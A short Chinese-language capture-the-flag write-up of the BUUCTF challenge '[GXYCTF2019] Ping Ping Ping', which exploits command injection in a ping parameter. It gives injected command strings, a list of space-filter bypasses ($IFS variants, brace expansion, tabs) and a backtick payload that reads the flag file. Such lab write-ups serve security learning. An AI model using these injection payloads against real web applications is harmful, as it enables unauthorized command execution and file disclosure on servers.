BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping
是个ping, 传入/?ip=127.0.0.1看看
命令执行, 立刻想到||管道符:
/?ip=127.0.0.1||ls
不行, 那就封号;
/?ip=127.0.0.1;ls
成功获得两个文件名
flag.php
index.php
然后cat flag.php试试
提示空格被过滤了
那就绕过,空格绕过的方法如下:
- $IFS
- ${IFS}
- $IFS$1 //$1改成$加其他数字貌似都行
- <
- <>
- {cat,flag.php} //用逗号实现了空格功能
- %20
- %09
试了一下, 发现他过滤了flag字符串,,,,那就看看index.php喽
?ip=127.0.0.1;cat$IFS$1index.php
得到:
对flag过滤非常严格, 那就不用flag了,在linux中, 可以把ls的结果,作为cat的参数,就不用flag了:
?ip=127.0.0.1;cat$IFS$9`ls`
但是源码里没有flag, 我寻思着不应该啊, 特意抓包看了一下, 他给我写到注释里了, f12就好了.
阿西吧
![BUUCTF_web_第13题:[RoarCTF 2019]Easy Calc](https://qixingbit.com/zb_users/cache/thumbs/e581433cf95abf86902cf20e3434f416-120-84-1.png)
![BUUCTF_web_第七题:[极客大挑战 2019]Secret File](https://qixingbit.com/zb_users/cache/thumbs/075fc83cc7833d50024939dd183b29a8-120-84-1.png)
![BUUCTF_web_第六题:[ACTF2020 新生赛]Include](https://qixingbit.com/zb_users/cache/thumbs/2a859a1bbaca44e0a85470cbc34c9281-120-84-1.png)
